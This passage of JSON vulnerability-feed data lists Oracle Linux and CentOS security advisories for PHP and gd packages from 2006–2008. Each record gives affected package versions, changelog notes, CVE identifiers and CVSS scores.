"lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageFilename": "php-pgsql-4.3.9-3.22.i386.rpm", "packageName": "php-pgsql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageFilename": "php-ldap-4.3.9-3.22.i386.rpm", "packageName": "php-ldap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageFilename": "php-ldap-4.3.9-3.22.x86_64.rpm", "packageName": "php-ldap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageFilename": "php-pear-4.3.9-3.22.i386.rpm", "packageName": "php-pear", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "src", "packageFilename": "php-4.3.9-3.22.src.rpm", "packageName": "php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "src", "packageFilename": "php-4.3.9-3.22.src.rpm", "packageName": "php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageFilename": "php-pear-4.3.9-3.22.x86_64.rpm", "packageName": "php-pear", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "i386", "packageFilename": "php-mysql-4.3.9-3.22.i386.rpm", "packageName": "php-mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageFilename": "php-xmlrpc-4.3.9-3.22.x86_64.rpm", "packageName": "php-xmlrpc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageFilename": "php-devel-4.3.9-3.22.x86_64.rpm", "packageName": "php-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.3.9-3.22", "arch": "x86_64", "packageFilename": "php-ncurses-4.3.9-3.22.x86_64.rpm", "packageName": "php-ncurses", "operator": "lt"}], "description": " [4.3.9-3.22]\n - avoid default pear.conf change\n \n [4.3.9-3.21]\n - add security fix for CVE-2006-5465 from upstream\n \n [4.3.9-3.20]\n - add fix for php_error varargs use (#199947)\n \n [4.3.9-3.18]\n - rebuild\n \n [4.3.9-3.17]\n - add security fix from upstream: CVE-2006-4484\n - add metaphone() fix (#205714)\n \n [4.3.9-3.16]\n - add security fixes from upstream:\n CVE-2006-3016, CVE-2006-4020, CVE-2006-4482, CVE-2006-4486 ", "edition": 3, "reporter": "Oracle", "published": "2006-11-30T00:00:00", "title": "Important php security update ", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-4486", "CVE-2006-4484", "CVE-2006-4020", "CVE-2006-3016", "CVE-2006-4482", "CVE-2006-5465"], "modified": "2006-11-30T00:00:00", "id": "ELSA-2006-0669", "href": "http://linux.oracle.com/errata/ELSA-2006-0669.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:44:29", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.el4_6.1", "arch": "i386", "packageFilename": "gd-progs-2.0.28-5.4E.el4_6.1.i386.rpm", "packageName": "gd-progs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.el4_6.1", "arch": "x86_64", "packageFilename": "gd-devel-2.0.28-5.4E.el4_6.1.x86_64.rpm", "packageName": "gd-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.el4_6.1", "arch": "i386", "packageFilename": "gd-devel-2.0.28-5.4E.el4_6.1.i386.rpm", "packageName": "gd-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.33-9.4.el5_1.1", "arch": "src", "packageFilename": "gd-2.0.33-9.4.el5_1.1.src.rpm", "packageName": "gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.33-9.4.el5_1.1", "arch": "src", "packageFilename": "gd-2.0.33-9.4.el5_1.1.src.rpm", "packageName": "gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.33-9.4.el5_1.1", "arch": "src", "packageFilename": "gd-2.0.33-9.4.el5_1.1.src.rpm", "packageName": "gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.33-9.4.el5_1.1", "arch": "i386", "packageFilename": "gd-devel-2.0.33-9.4.el5_1.1.i386.rpm", "packageName": "gd-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.33-9.4.el5_1.1", "arch": "i386", "packageFilename": "gd-devel-2.0.33-9.4.el5_1.1.i386.rpm", "packageName": "gd-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.33-9.4.el5_1.1", "arch": "x86_64", "packageFilename": "gd-2.0.33-9.4.el5_1.1.x86_64.rpm", "packageName": "gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.33-9.4.el5_1.1", "arch": "ia64", "packageFilename": "gd-progs-2.0.33-9.4.el5_1.1.ia64.rpm", "packageName": "gd-progs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.el4_6.1", "arch": "ia64", "packageFilename": "gd-2.0.28-5.4E.el4_6.1.ia64.rpm", "packageName": "gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.el4_6.1", "arch": "ia64", "packageFilename": "gd-progs-2.0.28-5.4E.el4_6.1.ia64.rpm", "packageName": "gd-progs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.el4_6.1", "arch": "src", "packageFilename": "gd-2.0.28-5.4E.el4_6.1.src.rpm", "packageName": "gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.el4_6.1", "arch": "src", "packageFilename": "gd-2.0.28-5.4E.el4_6.1.src.rpm", "packageName": "gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.el4_6.1", "arch": "src", "packageFilename": "gd-2.0.28-5.4E.el4_6.1.src.rpm", "packageName": "gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.33-9.4.el5_1.1", "arch": "ia64", "packageFilename": "gd-2.0.33-9.4.el5_1.1.ia64.rpm", "packageName": "gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.33-9.4.el5_1.1", "arch": "i386", "packageFilename": "gd-progs-2.0.33-9.4.el5_1.1.i386.rpm", "packageName": "gd-progs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.33-9.4.el5_1.1", "arch": "x86_64", "packageFilename": "gd-progs-2.0.33-9.4.el5_1.1.x86_64.rpm", "packageName": "gd-progs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.el4_6.1", "arch": "x86_64", "packageFilename": "gd-2.0.28-5.4E.el4_6.1.x86_64.rpm", "packageName": "gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.33-9.4.el5_1.1", "arch": "i386", "packageFilename": "gd-2.0.33-9.4.el5_1.1.i386.rpm", "packageName": "gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.33-9.4.el5_1.1", "arch": "i386", "packageFilename": "gd-2.0.33-9.4.el5_1.1.i386.rpm", "packageName": "gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.el4_6.1", "arch": "i386", "packageFilename": "gd-2.0.28-5.4E.el4_6.1.i386.rpm", "packageName": "gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.el4_6.1", "arch": "i386", "packageFilename": "gd-2.0.28-5.4E.el4_6.1.i386.rpm", "packageName": "gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.el4_6.1", "arch": "i386", "packageFilename": "gd-2.0.28-5.4E.el4_6.1.i386.rpm", "packageName": "gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.33-9.4.el5_1.1", "arch": "ia64", "packageFilename": "gd-devel-2.0.33-9.4.el5_1.1.ia64.rpm", "packageName": "gd-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.el4_6.1", "arch": "x86_64", "packageFilename": "gd-progs-2.0.28-5.4E.el4_6.1.x86_64.rpm", "packageName": "gd-progs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.33-9.4.el5_1.1", "arch": "x86_64", "packageFilename": "gd-devel-2.0.33-9.4.el5_1.1.x86_64.rpm", "packageName": "gd-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.0.28-5.4E.el4_6.1", "arch": "ia64", "packageFilename": "gd-devel-2.0.28-5.4E.el4_6.1.ia64.rpm", "packageName": "gd-devel", "operator": "lt"}], "description": " [2.0.28-5.E4.1]\n - security fixes\n - Resolves: #432784 ", "edition": 3, "reporter": "Oracle", "published": "2008-02-28T00:00:00", "title": "Moderate: gd security update ", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-4484", "CVE-2007-3476", "CVE-2007-2756", "CVE-2007-3472", "CVE-2007-3475", "CVE-2007-0455", "CVE-2007-3473"], "modified": "2008-02-28T00:00:00", "id": "ELSA-2008-0146", "href": "http://linux.oracle.com/errata/ELSA-2008-0146.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "centos": [{"lastseen": "2017-10-12T14:44:57", "references": ["https://rhn.redhat.com/errata/RHSA-2006-0669.html", "http://pasi.pirhonen.eu/", "http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-mysql-4.3.9-3.18.s390x.rpm", "packageName": "php-mysql", "arch": "s390x", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-ncurses-4.3.9-3.18.x86_64.rpm", "packageName": "php-ncurses", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-odbc-4.3.2-36.ent.ia64.rpm", "packageName": "php-odbc", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-snmp-4.3.9-3.18.s390x.rpm", "packageName": "php-snmp", "arch": "s390x", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-mysql-4.3.9-3.18.ia64.rpm", "packageName": "php-mysql", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-pear-4.3.9-3.18.x86_64.rpm", "packageName": "php-pear", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-ldap-4.3.9-3.18.s390x.rpm", "packageName": "php-ldap", "arch": "s390x", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-domxml-4.3.9-3.18.x86_64.rpm", "packageName": "php-domxml", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-imap-4.3.9-3.18.s390x.rpm", "packageName": "php-imap", "arch": "s390x", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-mbstring-4.3.9-3.18.x86_64.rpm", "packageName": "php-mbstring", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-mysql-4.3.2-36.ent.ia64.rpm", "packageName": "php-mysql", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-odbc-4.3.2-36.ent.s390.rpm", "packageName": "php-odbc", "arch": "s390", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-pgsql-4.3.2-36.ent.s390.rpm", "packageName": "php-pgsql", "arch": "s390", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-gd-4.3.9-3.18.x86_64.rpm", "packageName": "php-gd", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-pgsql-4.3.2-36.ent.ia64.rpm", "packageName": "php-pgsql", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-pear-4.3.9-3.18.s390x.rpm", "packageName": "php-pear", "arch": "s390x", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-xmlrpc-4.3.9-3.18.x86_64.rpm", "packageName": "php-xmlrpc", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-pgsql-4.3.9-3.18.x86_64.rpm", "packageName": "php-pgsql", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-xmlrpc-4.3.9-3.18.ia64.rpm", "packageName": "php-xmlrpc", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-gd-4.3.9-3.18.s390.rpm", "packageName": "php-gd", "arch": "s390", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-odbc-4.3.9-3.18.i386.rpm", "packageName": "php-odbc", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-mysql-4.3.9-3.18.i386.rpm", "packageName": "php-mysql", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-devel-4.3.9-3.18.ia64.rpm", "packageName": "php-devel", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-4.3.2-36.ent.x86_64.rpm", "packageName": "php", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-ncurses-4.3.9-3.18.i386.rpm", "packageName": "php-ncurses", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-4.3.9-3.18.src.rpm", "packageName": "php", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-4.3.9-3.18.src.rpm", "packageName": "php", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-ldap-4.3.2-36.ent.s390x.rpm", "packageName": "php-ldap", "arch": "s390x", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-domxml-4.3.9-3.18.ia64.rpm", "packageName": "php-domxml", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-devel-4.3.2-36.ent.s390.rpm", "packageName": "php-devel", "arch": "s390", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-mysql-4.3.2-36.ent.x86_64.rpm", "packageName": "php-mysql", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-devel-4.3.2-36.ent.i386.rpm", "packageName": "php-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-mysql-4.3.2-36.ent.i386.rpm", "packageName": "php-mysql", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-ldap-4.3.9-3.18.s390.rpm", "packageName": "php-ldap", "arch": "s390", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-odbc-4.3.2-36.ent.i386.rpm", "packageName": "php-odbc", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-domxml-4.3.9-3.18.i386.rpm", "packageName": "php-domxml", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-mbstring-4.3.9-3.18.i386.rpm", "packageName": "php-mbstring", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-devel-4.3.9-3.18.i386.rpm", "packageName": "php-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-pgsql-4.3.2-36.ent.i386.rpm", "packageName": "php-pgsql", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-devel-4.3.9-3.18.s390.rpm", "packageName": "php-devel", "arch": "s390", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-snmp-4.3.9-3.18.s390.rpm", "packageName": "php-snmp", "arch": "s390", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-odbc-4.3.9-3.18.x86_64.rpm", "packageName": "php-odbc", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-imap-4.3.2-36.ent.s390.rpm", "packageName": "php-imap", "arch": "s390", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-pgsql-4.3.2-36.ent.x86_64.rpm", "packageName": "php-pgsql", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-4.3.2-36.ent.src.rpm", "packageName": "php", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-4.3.2-36.ent.src.rpm", "packageName": "php", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-gd-4.3.9-3.18.s390x.rpm", "packageName": "php-gd", "arch": "s390x", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-devel-4.3.2-36.ent.x86_64.rpm", "packageName": "php-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-pgsql-4.3.9-3.18.ia64.rpm", "packageName": "php-pgsql", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-ldap-4.3.2-36.ent.x86_64.rpm", "packageName": "php-ldap", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-mbstring-4.3.9-3.18.s390.rpm", "packageName": "php-mbstring", "arch": "s390", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-devel-4.3.2-36.ent.ia64.rpm", "packageName": "php-devel", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-mysql-4.3.9-3.18.s390.rpm", "packageName": "php-mysql", "arch": "s390", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-ncurses-4.3.9-3.18.s390x.rpm", "packageName": "php-ncurses", "arch": "s390x", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-xmlrpc-4.3.9-3.18.s390x.rpm", "packageName": "php-xmlrpc", "arch": "s390x", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-mbstring-4.3.9-3.18.ia64.rpm", "packageName": "php-mbstring", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-mysql-4.3.9-3.18.x86_64.rpm", "packageName": "php-mysql", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-4.3.2-36.ent.s390x.rpm", "packageName": "php", "arch": "s390x", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-pgsql-4.3.2-36.ent.s390x.rpm", "packageName": "php-pgsql", "arch": "s390x", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-domxml-4.3.9-3.18.s390.rpm", "packageName": "php-domxml", "arch": "s390", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-ldap-4.3.9-3.18.x86_64.rpm", "packageName": "php-ldap", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-pear-4.3.9-3.18.s390.rpm", "packageName": "php-pear", "arch": "s390", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-imap-4.3.9-3.18.i386.rpm", "packageName": "php-imap", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-domxml-4.3.9-3.18.s390x.rpm", "packageName": "php-domxml", "arch": "s390x", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-4.3.9-3.18.i386.rpm", "packageName": "php", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-devel-4.3.9-3.18.x86_64.rpm", "packageName": "php-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-odbc-4.3.2-36.ent.s390x.rpm", "packageName": "php-odbc", "arch": "s390x", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-devel-4.3.9-3.18.s390x.rpm", "packageName": "php-devel", "arch": "s390x", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-imap-4.3.2-36.ent.s390x.rpm", "packageName": "php-imap", "arch": "s390x", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-ldap-4.3.2-36.ent.i386.rpm", "packageName": "php-ldap", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-ldap-4.3.9-3.18.ia64.rpm", "packageName": "php-ldap", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-ncurses-4.3.9-3.18.s390.rpm", "packageName": "php-ncurses", "arch": "s390", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-4.3.9-3.18.s390x.rpm", "packageName": "php", "arch": "s390x", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-pgsql-4.3.9-3.18.s390.rpm", "packageName": "php-pgsql", "arch": "s390", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-mysql-4.3.2-36.ent.s390x.rpm", "packageName": "php-mysql", "arch": "s390x", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-pear-4.3.9-3.18.i386.rpm", "packageName": "php-pear", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-mbstring-4.3.9-3.18.s390x.rpm", "packageName": "php-mbstring", "arch": "s390x", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-imap-4.3.9-3.18.s390.rpm", "packageName": "php-imap", "arch": "s390", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-imap-4.3.9-3.18.ia64.rpm", "packageName": "php-imap", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-ldap-4.3.9-3.18.i386.rpm", "packageName": "php-ldap", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-pear-4.3.9-3.18.ia64.rpm", "packageName": "php-pear", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-mysql-4.3.2-36.ent.s390.rpm", "packageName": "php-mysql", "arch": "s390", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-imap-4.3.9-3.18.x86_64.rpm", "packageName": "php-imap", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-ncurses-4.3.9-3.18.ia64.rpm", "packageName": "php-ncurses", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-snmp-4.3.9-3.18.i386.rpm", "packageName": "php-snmp", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-odbc-4.3.2-36.ent.x86_64.rpm", "packageName": "php-odbc", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-pgsql-4.3.9-3.18.i386.rpm", "packageName": "php-pgsql", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-4.3.9-3.18.ia64.rpm", "packageName": "php", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-ldap-4.3.2-36.ent.s390.rpm", "packageName": "php-ldap", "arch": "s390", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-imap-4.3.2-36.ent.ia64.rpm", "packageName": "php-imap", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-imap-4.3.2-36.ent.x86_64.rpm", "packageName": "php-imap", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "4.3.2-36.ent", "packageFilename": "php-4.3.2-36.ent.s390.rpm", "packageName": "php", "arch": "s390", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-xmlrpc-4.3.9-3.18.s390.rpm", "packageName": "php-xmlrpc", "arch": "s390", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.3.9-3.18", "packageFilename": "php-odbc-4.3.9-3.18.ia64.rpm", "packageName": "php-odbc", "arch": "ia64", "operator": "lt"}, 